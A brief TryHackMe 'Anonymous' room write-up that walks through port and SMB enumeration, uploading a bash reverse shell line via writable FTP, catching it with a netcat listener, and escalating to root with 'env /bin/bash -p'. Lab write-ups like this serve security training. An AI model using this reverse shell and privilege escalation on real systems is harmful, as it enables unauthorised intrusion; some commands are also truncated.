Anonymous — TryHackMe Write-up | Cyberw1ng
2 min readJul 27, 2022
Not the hacking group
Task 1
1. Enumerate the machine. How many ports are open?
Use Nmap to Scan Ports - nmap -sC -sV <Machine-ip>
2. What service is running on port 21?
Ans: ftp
3. What service is running on ports 139 and 445?
Ans: smb
4. There’s a share on the user’s computer. What’s it called?
Hint: smbclient -L \\ip/
Ans: pics
5. user.txt
We can Access FTP and Upload Files, So we have to upload a code to gain Reverse Shell
echo “bash -i >& /dev/tcp/ 0>&1” >
ftp <machine-ip>
cd scripts
After that you need to Make a Listener
nc -lvnp 1234
It May Take Time upto 3 Minutes to Get a Reverse Shell, and Once You get is > > Cat user.txt
6. root.txt
use the Below Command to Escalate Privilege
env /bin/bash -p
cd /root
cat root.txt
Thank You For Reading!!!
Happy Hacking!!!